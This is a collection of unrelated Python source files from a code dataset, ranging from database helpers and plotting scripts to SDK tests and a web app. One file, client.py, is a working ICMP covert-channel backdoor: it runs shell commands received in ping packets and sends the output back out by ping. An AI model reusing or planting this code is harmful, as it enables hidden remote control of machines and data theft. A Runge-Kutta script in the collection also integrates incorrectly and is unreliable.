\" + \", \".join(users + things)\n        if thing:\n            string += \"\\n{wВ руках:{n \" + \", \".join(thing)\n        return string\n","sub_path":"typeclasses/characters.py","file_name":"characters.py","file_ext":"py","file_size_in_byte":13673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"211312934","text":"#!/usr/bin/env python\nimport sqlite3\nimport time\nimport bottle\n\n'''\nCreates a database connection.\n\nThe connection can be temporarily blocked by the \"EXCLUSIVE\"\nsetting (used for writes). If the connection is blocked, a retry will happen\nafter a specified period of time, up to a max trycount before failure.\n\nThe db_connect decorator can be used to provide a connection to only those\nroutes which need it.\n\n'''\n\ndef db_connect(db=None, exclusive=False):\n    '''Connection decorator for use in routes.\n\n    Args:\n        db:(str) Path/name of sqlite3 database.\n        exclusive:(Boolean) \"True\" to connect using exclusive mode.\n    '''\n    def decorator(func):\n        def wrapper(*args, **kwargs):\n            if db is None:\n                raise bottle.HTTPError(500, 'Database not specified.')\n            dbcon = DB_Connection(db, exclusive)\n            connection = dbcon.connection\n            kwargs['conn'] = connection\n            exec_func = func(*args, **kwargs)\n            # close connection after callback executed\n            connection.close()\n            return exec_func\n        return wrapper\n    return decorator\n\nclass DB_Connection(object):\n\n    def __init__(self, db, exclusive=False):\n        self.database = db\n        self.trycount = 0\n        self.exclusive = exclusive\n\n        # 5 second max delay\n        self.retry_delay = .05\n        self.max_trycount = 100\n\n    @property\n    def connection(self):\n        '''Returns database connection'''\n        connection = self._try_db()\n        # set exclusive lock for write connections\n        if self.exclusive is True:\n            connection.isolation_level = 'EXCLUSIVE'\n            connection.execute('BEGIN EXCLUSIVE')\n        return connection\n\n    def _try_db(self):\n        '''\n        Repeatedly tries database connection until failure limits reached.\n\n        Returns:\n            sqlite3 database connection.\n        Raises:\n            bottle.HTTPError\n        '''\n        if self.trycount > self.max_trycount:\n            raise bottle.HTTPError(500, 'Database connection attempts timed out.')\n        dbc = self.__connectdb()\n        if dbc is None:\n            time.sleep(self.retry_delay)\n            self.trycount += 1\n            return self._try_db()\n        return dbc\n\n    def __connectdb(self):\n        try:\n            dbc = sqlite3.connect(self.database)\n            return dbc\n        except sqlite3.OperationalError:\n            return None\n        except Exception:\n            raise bottle.HTTPError(500, 'Cannot connect to 
database.')\n\n","sub_path":"plugins/db_connection.py","file_name":"db_connection.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"349571462","text":"import numpy as np \nimport matplotlib.pyplot as plt\nimport os\nimport pdb\n\n##### BEGIN USER INPUT #####\n\ndataDir = \"/home/chris/Research/GEMS_runs/prf_nonlinManifold/pyGEMS/standingFlame/dataProc/40microsec\" \t# base dir where bases for particular dataset are stored\n# singValsFile = \"podData_cons_vector_test/singularValues_0123.npy\"\t\t\t\t\t\t\t\t\t\t\t# continuation of dataDir to singular values file\n# singValsFile = \"podData_cons_scalar_samp1/singularValues_0_1_2_3.npy\"\nsingValsFile = \"podData_cons_scalar_test/singularValues_0_123.npy\"\nlBound = 1\nuBound = 200\n\n##### END USER INPUT #####\n\n# load and check bounds\ninDir = os.path.join(dataDir, singValsFile)\nsingVals = np.load(inDir, allow_pickle=True)\n\njagged = False\n# if jagged array, will come in as a list of arrays\nif (singVals.ndim == 1):\n\tjagged = True\n\tnumGroups = singVals.shape[0]\n\tnumVals = np.zeros(numGroups, dtype=np.int32)\n\tfor groupIdx in range(numGroups):\n\t\tnumVals[groupIdx] = singVals[groupIdx].shape[0]\n\tassert(np.all(uBound <= numVals))\n\n# if uniform array (only one group, or equally-sized groups), comes as a 2D array\nelse:\n\tnumGroups, numVals = singVals.shape\n\t# pdb.set_trace()\n\tassert(uBound <= numVals)\n\n\nassert(lBound >= 1)\nassert(lBound < uBound)\n\n# calculate energy decay for each group\nfig = plt.figure()\nax = fig.add_subplot(111)\nenergy = np.zeros(uBound - lBound + 1, dtype = np.float64)\nfor groupIdx in range(numGroups):\n\tprint(\"Group \"+str(groupIdx+1))\n\n\tif jagged:\n\t\tsingValsGroup = singVals[groupIdx]\n\telse:\n\t\tsingValsGroup = singVals[groupIdx,:]\n\n\tsumSq = np.sum(np.square(singValsGroup))\n\tfor sIdx in range(lBound-1, uBound):\n\t\tenergy[sIdx] = 100. * (1. - np.sum(np.square(singValsGroup[:(sIdx+1)])) / sumSq)\n\n\t# pdb.set_trace()\n\n\tthresh99 = np.argwhere(energy < 1.0)[0][0] + 1\n\tthresh99p9 = np.argwhere(energy < 0.1)[0][0] + 1\n\tthresh99p99 = np.argwhere(energy < 0.01)[0][0] + 1\n\n\tprint(\"99%: \"+str(thresh99))\n\tprint(\"99.9%: \"+str(thresh99p9))\n\tprint(\"99.99%: \"+str(thresh99p99))\n\n\tax.semilogy(range(lBound,uBound+1), energy)\n\n\tif (groupIdx == 0):\n\t\tminY = np.amin(energy)\n\telse:\n\t\tminY = min(np.amin(energy), minY)\n\nif (minY < 1e-15): minY = 1e-16\n\nax.set_ylim([minY,100])\n\nplt.show()","sub_path":"utils/plotPODEnergyDecay.py","file_name":"plotPODEnergyDecay.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"335732434","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3350)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.6-x86_64/egg/tokenquery/nlp/tokenizer.py\n# Compiled at: 2017-01-30 13:08:47\n# Size of source mod 2**32: 4190 bytes\nimport nltk\nfrom nltk.tokenize import word_tokenize\nfrom tokenquery.models.token import Token\nfrom nltk.tokenize.regexp import RegexpTokenizer\nfrom nltk.tokenize import WhitespaceTokenizer\n\nclass Tokenizer:\n __doc__ = \"\\n Tokenizer will break text into a list of Token objects.\\n Currently it supports SpaceTokenizer, NLTKWhiteSpaceTokenizer,\\n and PTBTokenizer (default) using NLTK lib. 
Since NLTK PTBTokenizer\\n does not provide spans for tokens, we have a wrapper\\n over PTB tokenizer to capture start and end of the tokens\\n but is currently in beta mode. please report any potential\\n problems.\\n\\n :param tokenizer_type: type of tokenizer one of 'SpaceTokenizer',\\n 'NLTKWhiteSpaceTokenizer', 'PTBTokenizer'\\n :type tokenizer_type: str\\n \"\n\n def __init__(self, tokenizer_type='PTBTokenizer'):\n if tokenizer_type in ('SpaceTokenizer', 'NLTKWhiteSpaceTokenizer', 'PTBTokenizer'):\n self.tokenizer_type = tokenizer_type\n else:\n print('Unrecognized tokenizer type : setting back to default (PTBTokenizer)')\n self.tokenizer_type = 'PTBTokenizer'\n try:\n nltk.data.find('punkt.zip')\n except LookupError:\n nltk.download('punkt')\n\n def tokenize(self, text):\n \"\"\"\n tokenize text into a list of Token objects\n\n :param text: text to be tokenized (might contains several sentences)\n :type text: str\n :return: List of Token objects\n :rtype: list(Token)\n \"\"\"\n tokens = []\n if self.tokenizer_type == 'SpaceTokenizer':\n operator = RegexpTokenizer('\\\\w+|\\\\$[\\\\d\\\\.]+|\\\\S+')\n for counter, span in enumerate(operator.span_tokenize(text)):\n new_token = Token(counter, text[span[0]:span[1]], span[0], span[1])\n tokens.append(new_token)\n\n else:\n if self.tokenizer_type == 'NLTKWhiteSpaceTokenizer':\n operator = WhitespaceTokenizer()\n for counter, span in enumerate(operator.span_tokenize(text)):\n new_token = Token(counter, text[span[0]:span[1]], span[0], span[1])\n tokens.append(new_token)\n\n elif self.tokenizer_type == 'PTBTokenizer':\n ptb_tokens = word_tokenize(text)\n counter = 0\n for token, span in self._penn_treebank_tokens_with_spans(text, ptb_tokens):\n new_token = Token(counter, token, span[0], span[1])\n counter += 1\n tokens.append(new_token)\n\n return tokens\n\n def _penn_treebank_tokens_with_spans(self, text, tokens):\n text_from_tokens = ''\n for token in tokens:\n norm_token = token.replace('``', '\"').replace(\"''\", '\"').replace('-LRB-', '(').replace('-RRB-', ')').replace('-LSB-', '[').replace('-RSB-', ']').replace('-LCB-', '{').replace('-RCB-', '}')\n text_from_tokens += ' ' + norm_token\n\n text_from_tokens = text_from_tokens.strip().lstrip()\n spans = []\n start_of_span = 0\n t_index = 0\n for t_f_t_index, t_char in enumerate(text_from_tokens):\n if t_char == ' ':\n spans.append((start_of_span, t_index))\n start_of_span = t_index\n continue\n if text[t_index].isspace():\n while text[t_index].isspace() and t_index < len(text):\n t_index += 1\n start_of_span = t_index\n\n if text[t_index] != t_char:\n raise Exception('something went wrong while finding spans for PTB tokens {} does not match {}'.format(text[t_index], t_char))\n else:\n t_index += 1\n\n spans.append((start_of_span, t_index))\n assert len(spans) == len(tokens)\n return zip(tokens, spans)","sub_path":"pycfiles/tokenquery-0.1.1-py3.5/tokenizer.cpython-35.py","file_name":"tokenizer.cpython-35.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"315751444","text":"import os\nimport re\nimport readline\n\n\ng={\n 'local_path':'None',\n 'remote_path':'None',\n 'remote_userid':'None',\n 'remote_password':'None',\n 'project_name':'None',\n 'local_repository':'D:\\\\local\\\\SGitRep\\\\',}\nPROPERTIES =[ k for k in g.keys() ]\nCOMMANDS = ['set', 'get', 'showallproperty', 'commit', 'exit'] \nRE_SPACE = re.compile('.*\\s+$', re.M)\n\nclass Completer(object):\n\n def __init__(self):\n 
readline.set_completer_delims(' \\t\\n;')\n readline.parse_and_bind(\"tab: complete\")\n readline.parse_and_bind('set editing-mode vi')\n\n def _listdir(self, root):\n \"List directory 'root' appending the path separator to subdirs.\"\n res = []\n for name in os.listdir(root):\n path = os.path.join(root, name)\n if os.path.isdir(path):\n name += os.sep\n res.append(name)\n return res\n\n def _complete_path(self, path=None):\n \"Perform completion of filesystem path.\"\n if not path:\n return self._listdir('.')\n dirname, rest = os.path.split(path)\n tmp = dirname if dirname else '.'\n res = [os.path.join(dirname, p)\n for p in self._listdir(tmp) if p.startswith(rest)]\n # more than one match, or single match which does not exist (typo)\n if len(res) > 1 or not os.path.exists(path):\n return res\n # resolved to a single directory, so return list of files below it\n if os.path.isdir(path):\n return [os.path.join(path, p) for p in self._listdir(path)]\n # exact file match terminates this completion\n return [path + ' ']\n\n def complete_extra(self, args):\n \"Completions for the 'extra' command.\"\n if not args:\n return self._complete_path('.')\n # treat the last arg as a path and complete it\n return self._complete_path(args[-1])\n\n def complete_set(self, args):\n if not args:\n return PROPERTIES\n # treat the last arg as a path and complete it\n lst =[]\n for property in PROPERTIES:\n if property.startswith(args[-1]):\n lst.append(property)\n return lst\n\n def complete_get(self, args):\n if not args:\n return PROPERTIES\n # treat the last arg as a path and complete it\n lst =[]\n for property in PROPERTIES:\n if property.startswith(args[-1]):\n lst.append(property)\n return lst\n\n def complete_exit(self, args):\n return []\n\n def complete_showallproperty(self, args):\n return []\n\n def complete(self, text, state):\n \"Generic readline completion entry point.\"\n buffer = readline.get_line_buffer()\n line = readline.get_line_buffer().split()\n # show all commands\n if not line:\n return [c + ' ' for c in COMMANDS][state]\n # account for last argument ending in a space\n if RE_SPACE.match(buffer):\n line.append('')\n # resolve command to the implementation function\n cmd = line[0].strip()\n if cmd in COMMANDS:\n impl = getattr(self, 'complete_%s' % cmd)\n args = line[1:]\n if args:\n return (impl(args) + [None])[state]\n return [cmd + ' '][state]\n results = [c + ' ' for c in COMMANDS if c.startswith(cmd)] + [None]\n return results[state]\n\n\n \n\ncomp = Completer()\nreadline.set_completer(comp.complete)\n\n\n# print comp._complete_path( path = 'd:\\\\local' )\n# print comp.get_list('d:\\\\local')\nraw_input('Enter section name: ')\n","sub_path":"test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"416379257","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\nimport threading\nimport time\nimport random\nimport sys\nimport os\nfrom scapy.all import *\nimport subprocess\nimport sendPing\n\nlock = threading.Lock()\n\n#global var shared accross threads\nbuff = []\nprev = [\"\"]\n\ndef mysniff():\n\twhile 1==1:\n\t\t\tpkts = sniff(filter=\"icmp[icmptype] == 8\", count=1)\n\t\t\tif pkts: \n\t\t\t\tfor pckt in pkts:\n\t\t\t\t\tcmd = str(pckt[ICMP][1:]).strip('\\x00')\n\t\t\t\t\tprint(\"received command:\"+cmd)\n\t\t\t\tlock.acquire()\n\t\t\t\ttry:\n\t\t\t\t\tbuff.append(cmd)\n\t\t\t\tfinally:\n\t\t\t\t\tlock.release()\n\t\t\ndef 
cmdExec(cmd):\n\treturn subprocess.check_output(cmd, shell=True)\n\n\ndef main():\n\tt = threading.Thread(target=mysniff)\n\tt.start()\n\twhile 1==1:\n\t\ttime.sleep(1)\n\t\tif len(buff) != 0 :\n\t\t\t\tif prev[0] != buff[0]:\t\t#is it ping sent out from here?\n\t\t\t\t\tresult = cmdExec(buff[0])\n\t\t\t\t\tprint(result)\n\t\t\t\t\tprint(\"sending ...{0}\".format(result))\n\t\t\t\t\tsendPing.sendP(result)\n\t\t\t\t\tprev[0] = result\n\t\t\t\t\tdel buff[:]\n\t\t\t\telse:\n\t\t\t\t\tdel buff[:] #just delete buff then\n\nif __name__ == '__main__':\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\ttry:\n\t\t\tsys.exit(0)\n\t\texcept SystemExit:\n\t\t\tos._exit(0)\n\n\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"632567175","text":"import unittest\nfrom scipy import stats\nfrom pyapprox.approximate import *\nfrom pyapprox.benchmarks.benchmarks import setup_benchmark\nimport pyapprox as pya\nclass TestApproximate(unittest.TestCase):\n\n def test_approximate_sparse_grid_default_options(self):\n nvars = 3\n benchmark = setup_benchmark('ishigami',a=7,b=0.1)\n univariate_variables = [stats.uniform(0,1)]*nvars\n approx = approximate(benchmark.fun,univariate_variables,'sparse-grid')\n nsamples = 100\n error = compute_l2_error(\n approx,benchmark.fun,approx.variable_transformation.variable,\n nsamples)\n assert error<1e-12\n\n def test_approximate_sparse_grid_user_options(self):\n nvars = 3\n benchmark = setup_benchmark('ishigami',a=7,b=0.1)\n univariate_variables = [stats.uniform(0,1)]*nvars\n errors = []\n def callback(approx):\n nsamples = 1000\n error = compute_l2_error(\n approx,benchmark.fun,approx.variable_transformation.variable,\n nsamples)\n errors.append(error)\n univariate_quad_rule_info = [\n pya.clenshaw_curtis_in_polynomial_order,\n pya.clenshaw_curtis_rule_growth]\n options = {'univariate_quad_rule_info':univariate_quad_rule_info,\n 'max_nsamples':110,'tol':0,'verbose':False}\n approx = approximate(\n benchmark.fun,univariate_variables,'sparse-grid',callback,options)\n assert np.min(errors)<1e-12\n\n def test_approximate_polynomial_chaos_default_options(self):\n nvars = 3\n benchmark = setup_benchmark('ishigami',a=7,b=0.1)\n univariate_variables = [stats.uniform(0,1)]*nvars\n approx = approximate(\n benchmark.fun,univariate_variables,method='polynomial-chaos')\n nsamples = 100\n error = compute_l2_error(\n approx,benchmark.fun,approx.variable_transformation.variable,\n nsamples)\n assert error<1e-12\n\nif __name__== \"__main__\": \n approximate_test_suite = unittest.TestLoader().loadTestsFromTestCase(\n TestApproximate)\n unittest.TextTestRunner(verbosity=2).run(approximate_test_suite)\n","sub_path":"pyapprox/tests/test_approximate.py","file_name":"test_approximate.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"206650218","text":"import pandas as pd\nimport pytest\nfrom src.data_preprocessing.make_functional_edges_and_weights import EdgeWeightExtractor\nfrom src.utils.miscellaneous import read_exclusions_yaml\n\n\n@pytest.mark.skip(reason=\"Don't run up a big big query bill\")\ndef test_return_data_frame(functional_edges_fixture):\n instance = EdgeWeightExtractor(read_exclusions_yaml(\n \"document_types_excluded_from_the_topic_taxonomy.yml\")['document_types'], \"20190512\", \"20190512\")\n pd.set_option('display.max_colwidth', -1)\n 
merged = instance.df.merge(functional_edges_fixture,\n on=['source_content_id', 'destination_content_id', 'weight'],\n indicator=True,\n how='outer')\n\n print(merged[merged['_merge'] != 'both'])\n print(merged[merged['_merge'] != 'both'].shape[0])\n assert merged[merged['_merge'] != 'both'].shape[0] == 0\n","sub_path":"tests/unit/data_preprocessing/test_make_functional_edges_and_weights.py","file_name":"test_make_functional_edges_and_weights.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"393432809","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[45]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n#Read Accelerometer data (Time, Acceleration)from input file.\nSample1_df = pd.read_csv('Sample1.csv') # saved csv content saved in dataframe \"csv_df\"\n\n# adding prediction column to datafram\nSample1_df['Predicted_Position'] =0\n\n# using abs function to make all values positive\nPos_Sample1_df = Sample1_df.abs()\n\nprint(Pos_Sample1_df.head())\n\n# since our dataset is in dataframe, using dataframe plot function to draw a acceleration graph(DataFrame.plot)\nPos_Sample1_df.plot(x='time_tick',y='acc_X_value')\n\n\n#creating copy of dataframe for working\ndfdata = Pos_Sample1_df\nprint('dataframe shape: ',dfdata.shape)\n\n#printing last few rows\nprint(dfdata.tail())\n\n#find value of y for a given x using step size ha\n#initial values at y0 and x0\ndef rungekutta(x0,y0,x,h,a1,a2):\n #count number of iterations using step size\n #step height h\n n = (int)((x-x0)/h)\n print(\"number of iterations:\",n)\n #iterate for number of iterations\n y = y0\n #for i in range(1,n+1):\n # Apply Runge Kutta formula to find next values of y\n k1 = a1 # t0\n k2 = (y0+h*k1/2)-y0/(x0+h/2)-x0 #slope at y0+h/2 - reference wikipedia runge kutta method\n k3 = (y0+h*k2/2)-y0/(x0+h/2-x0) # y2-y1/x2-x1\n print(\"calculated k3:\",k3)\n k4 = a2\n \n #update next value of y\n y = y + (1/6.0) * (k1 + 2 * k2 + 2 * k3 + k4)\n dfdata.iloc[1,4] = y \n #update the next value of x \n x1 = dfdata.iloc[1,0]\n #==================================================\n y1 = y\n #for i in range(1,n+1):\n # Apply Runge Kutta formula to find next values of y\n \n k1 = (y0+h*k1/2)-y0/(x0+h/2)-x0 #slope at y0+h/2 - reference wikipedia runge kutta method\n k2 = (y0+h*k2/2)-y0/(x0+h/2-x0) # y2-y1/x2-x1\n print(\"calculated k3:\",k3)\n k3= a2\n k4 = dfdata.iloc[2,3]\n print(\"new k4:\",k4)\n #update next value of y\n y2 = y1 + (1/6.0) * (k1 + 2 * k2 + 2 * k3 + k4)\n dfdata.iloc[2,4] = y2 \n \n #update the next value of x \n x2 = dfdata.iloc[2,0]\n print(\"x2 y2:\",x2,y2)\n #=========================================================\n \n #for i in range(1,n+1):\n # Apply Runge Kutta formula to find next values of y\n \n k1 = (y0+h*k2/2)-y0/(x0+h/2-x0) # y2-y1/x2-x1\n print(\"calculated k3:\",k3)\n k2= a2\n k3 = dfdata.iloc[2,3]\n k4 = dfdata.iloc[3,3]\n print(\"new k4:\",k4)\n #update next value of y\n y3 = y2 + (1/6.0) * (k1 + 2 * k2 + 2 * k3 + k4)\n dfdata.iloc[3,4] = y3 \n \n #update the next value of x \n x3 = dfdata.iloc[3,0]\n print(\"x3 y3:\",x3,y3)\n #===============================\n for i in range(4, n+1):\n k1 = dfdata.iloc[i-3,3]\n k2 = dfdata.iloc[i-2,3]\n k3 = dfdata.iloc[i-1,3]\n k4 = dfdata.iloc[i,3]\n y_new = dfdata.iloc[i-1,4] + (1/6.0) * (k1 + 2 * k2 + 2 * k3 + k4)\n dfdata.iloc[i,4] = y_new\n \n return y\n\n#length of the dataframe\ntotal_rows = len(dfdata)\n\n\n#test with single 
values\nx0 = dfdata.iloc[0,0] #initial timestamp\nprint(\"x0:\", x0)\ny0 = 0 #initial position \nx = dfdata.iloc[total_rows-1,0] # final timestamp\nprint(\"x:\", x)\nh = dfdata.iloc[1,0]-dfdata.iloc[0,0] #step size\nprint(\"h:\", h)\na1 =dfdata.iloc[0,3]\nprint(\"a1:\", a1)\na2 = dfdata.iloc[1,3]\nprint(\"a2:\", a2)\n\n#calling runge-kutta method\ncheck = rungekutta(x0,y0,x,h,a1,a2)\n\n\n\nprint(dfdata)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Runge_test.py","file_name":"Runge_test.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"102113178","text":"# coding: utf-8\n\nimport os,sys\nimport wsgiref.handlers, cgi\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\n\nfrom ucf.pages.manager.addressbook_share import *\nfrom ucf.tablehelper.addressbook_share import *\n\nfrom ucf.config.ucfconfig import *\nfrom ucf.utils.ucfutil import *\nfrom ucf.utils.ucfxml import *\nfrom ucf.utils.helpers import *\nfrom ucf.utils.validates import *\nfrom ucf.utils.models import *\n\nfrom ucf.gdata.spreadsheet.util import *\n\n############################################################\n## 共有アドレス帳:ページヘルパー\n############################################################\nclass AddressBookSharePageHelper(ManageHelper):\n\n\t_config = None\n\n\tdef __init__(self):\n\t\t# 親のコンストラクタをコール\n\t\tManageHelper.__init__(self)\n\n\tdef onLoad(self):\n\t\tu''' '''\n\t\tparam_file_name = 'manager/addressbook/share/config.xml'\n\t\tparam_file_path = self.getParamFilePath(param_file_name)\n\n\t\tself._config = AddressBookShareConfig(param_file_path)\n\n############################################################\n## バリデーションチェッククラス \n############################################################\nclass AddressBookShareValidator(BaseValidator):\n\tu'''入力チェッククラス'''\n\n\tdef validate(self, helper, vo):\n\t\t\n\t\t# 初期化\n\t\tself.init()\n\n\t\tunique_id = UcfUtil.getHashStr(vo, 'unique_id')\n\n\t\tcheck_name = ''\n\t\tcheck_key = ''\n\t\tcheck_value = ''\n\n\t\tcmd_prefix_length = len(helper._config._cmd_prefix)\n\n\t\tfor k,v in vo.iteritems():\n\t\t\t# AutoCmdを処理\n\t\t\tif k.startswith(helper._config._cmd_prefix) and len(k) > cmd_prefix_length:\n\n\t\t\t\tcmd = v\n\t\t\t\tcheck_key = UcfUtil.subString(k, cmd_prefix_length)\n\t\t\t\tcheck_name = UcfUtil.getHashStr(vo, helper._config._dispname_prefix + check_key)\n\t\t\t\tcheck_value = UcfUtil.getHashStr(vo, check_key)\n\t\n\t\t\t\tself.applicateAutoCmd(check_value, check_key, check_name, cmd)\n\n\t\t#TODO unique_idがスプレッドシート検索に耐えられる値かどうかを判定(先頭数字NG、記号NG、全角数字NG....)\n\n\t\t# 重複チェック\n\t\tif self.total_count == 0:\n\t\t\t# 新規の場合のみチェック(更新時はunique_idは更新させない)\n\t\t\tif self.edit_type == UcfConfig.EDIT_TYPE_NEW:\n\t\t\t\ttable_helper = AddressBookShareTableHelper.createInstance(AddressBookShareTableHelperConfig(helper.getParamFilePath(AddressBookShareTableHelperConfig._config_file_path)))\n\t\t\t\tvo_check = table_helper.getDataByUniqueID(unique_id)\n\t\t\t\tif vo_check != None:\n\t\t\t\t\tself.appendValidate('unique_id', UcfMessage.getMessage(UcfMessage.MSG_VC_ALREADY_EXIST, ()))\n\n############################################################\n## ビューヘルパー\n############################################################\nclass AddressBookShareViewHelper(ViewHelper):\n\n\tdef applicate(self, vo, helper):\n\t\tvoVH = {}\n\n\t\t# ここで表示用変換を必要に応じて行うが、原則Djangoテンプレートのフィルタ機能を使う\n\t\tfor k,v in vo.iteritems():\n\t\t\tvoVH[k] = v\t\n\n\t\treturn 
voVH\n\n\n############################################################\n## 共有アドレス帳:設定ファイル用クラス\n############################################################\nclass AddressBookShareConfig(UcfConfig):\n#\tPREFIX_SCOND_ORG = 'sk_org_'\n\n\t_cmd_prefix = \"cmd_\"\n\t_dispname_prefix = \"dn_\"\n\n\tCACHEKEY_PREFIX_ADDRESSBOOK_ORG = 'CACHEKEY_PREFIX_ADDRESSBOOK_SHARE_ORG'\n\t_crypto_key = UcfConfig.CRYPTO_KEY\n\n\tMASTERINFO_SPREADSHEET_ACCOUNT = 'Spreadsheet/@account'\n\tMASTERINFO_SPREADSHEET_PASSWORD = 'Spreadsheet/@password'\n\tMASTERINFO_SPREADSHEET_KEY = 'Spreadsheet/@key'\n\tMASTERINFO_WORKSHEET_NAME = 'Spreadsheet/@worksheet_name'\n\tGMAILURL = 'Config/GMailURL'\n\n\t_xmlConfig = None\n\t_config_info = None\n\n\tdef __init__(self, param_file_path):\n\t\tself._xmlConfig\t= self.getConfig(param_file_path)\n\t\tself._config_info = self.exchangeConfigToHash(self._xmlConfig)\n\n\tdef getConfig(self, param_file_path):\n\t\tu''' 設定ファイル取得 '''\n\t\tif os.path.exists(param_file_path):\n\t\t\txmlConfig = UcfXml.load(param_file_path)\n\t\t\treturn xmlConfig\n\t\telse:\n\t\t\treturn None\n\n\tdef exchangeConfigToHash(self, xmlConfig):\n\t\tu''' 設定ファイルの情報をハッシュに変換 '''\n\t\tif xmlConfig != None:\n\t\t\t# ハッシュにして返す\n\t\t\tinfo = xmlConfig.exchangeToHash(isAttr=True, isChild=True)\n\t\t\treturn info\n\t\telse:\n\t\t\treturn None\n\n\tdef getListFields(self):\n\t\tu''' 設定ファイルから一覧表示項目情報を取得 '''\n\t\treturn self._xmlConfig.selectNodes('ListFields/Item')\n\n\tdef getOrgFields(self):\n\t\tu''' 設定ファイルから組織として扱う項目情報を取得 '''\n\t\treturn self._xmlConfig.selectNodes('OrgFields/Item')\n\n\tdef getGMailMailAddressID(self):\n\t\tu''' 設定ファイルからGMAILメールアドレスフィールドを取得 '''\n\t\tresult = ''\n\t\titem = self._xmlConfig.selectSingleNode('GMailFields/MailAddress/Item')\n\t\tif item != None:\n\t\t\tresult = item.getAttribute('id')\n\t\treturn result\n\t\n\tdef getGMailNameIDs(self):\n\t\tu''' 設定ファイルからGMAIL名前フィールド一覧を取得 '''\n\t\tresult = []\n\t\tfor item in self._xmlConfig.selectNodes('GMailFields/Name/Item'):\n\t\t\tresult.append(item.getAttribute('id'))\n\t\treturn result\n\t\n\tdef getGMailMailAddressFields(self):\n\t\tu''' 設定ファイルからGMAILメールアドレス項目情報を取得 '''\n\t\treturn self._xmlConfig.selectNodes('GMailFields/MailAddress/Item')\n\n\tdef getGMailURL(self):\n\t\tu''' 設定ファイルの値を取得:GMAILURL '''\n\t\treturn UcfUtil.getHashStr(self._config_info, self.GMAILURL)\n\n","sub_path":"src/ucf/pages/manager/addressbook_share.py","file_name":"addressbook_share.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"407553106","text":"import pytest\nfrom litleSdkPython.litleOnlineRequest import litleOnlineRequest\n\n\nclass TestToken:\n\n @classmethod\n @pytest.fixture(scope=\"class\", autouse=True)\n def setup(self, config):\n self.config = config\n\n def testSimpleToken(self, register_token_fixture):\n token = register_token_fixture\n token.accountNumber = '1233456789103801'\n litleXml = litleOnlineRequest(self.config)\n response = litleXml.sendRequest(token)\n assert(response.message == \"Account number was successfully registered\")\n\n def testSimpleTokenWithPaypage(self, register_token_fixture):\n token = register_token_fixture\n token.paypageRegistrationId = '1233456789101112'\n litleXml = litleOnlineRequest(self.config)\n response = litleXml.sendRequest(token)\n assert(response.message == \"Account number was successfully registered\")\n\n def testSimpleTokenWithEcheck(\n self, register_token_fixture, echeck_for_token_fixture):\n token = 
register_token_fixture\n echeck = echeck_for_token_fixture\n token.echeckForToken = echeck\n litleXml = litleOnlineRequest(self.config)\n response = litleXml.sendRequest(token)\n assert(response.message == \"Account number was successfully registered\")\n\n def testSimpleTokenWithApplepay(\n self, register_token_fixture,\n applepay_fixture, applepay_header_fixture):\n token = register_token_fixture\n applepay = applepay_fixture\n header = applepay_header_fixture\n applepay.header = header\n token.applepay = applepay\n litleXml = litleOnlineRequest(self.config)\n response = litleXml.sendRequest(token)\n assert(response.message == \"Account number was successfully registered\")\n assert(response.applepayResponse.transactionAmount == 0)\n\n def testTokenEcheckMissingRequiredField(\n self, register_token_fixture, echeck_for_token_fixture):\n token = register_token_fixture\n echeck = echeck_for_token_fixture\n echeck.accNum = None\n token.echeckForToken = echeck\n\n litle = litleOnlineRequest(self.config)\n with pytest.raises(Exception):\n litle.sendRequest(token)\n\n def testCovertPaypageRegistrationIdIntoToken(self, register_token_fixture):\n tokenRequest = register_token_fixture\n tokenRequest.paypageRegistrationId = \\\n '123456789012345678901324567890abcdefghi'\n\n litleXml = litleOnlineRequest(self.config)\n tokenResponse = litleXml.sendRequest(tokenRequest)\n assert(tokenResponse.litleToken == \"1111222233334444\")\n","sub_path":"litleSdkPythonTestv2/functional/test_token.py","file_name":"test_token.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"130756330","text":"from django.shortcuts import render\nfrom django.shortcuts import render_to_response\nfrom django.shortcuts import redirect\nfrom django.template import RequestContext\n\nfrom django import forms\nfrom .models import Film\nfrom haystack.query import SearchQuerySet\n\nclass SearchForm(forms.Form):\n searchBar = forms.CharField(label='Search', max_length=130)\n\n# Create your views here\n\n# home handles GET and POST requests\ndef home(request):\n if request.method == 'POST':\n form = SearchForm(request.POST)\n if form.is_valid():\n search = form['searchBar']\n\n query = SearchQuerySet().filter(\n content=form.cleaned_data['searchBar'])\n\n return render_to_response('maplist/index.html',\n {'form':search, 'results': query},\n 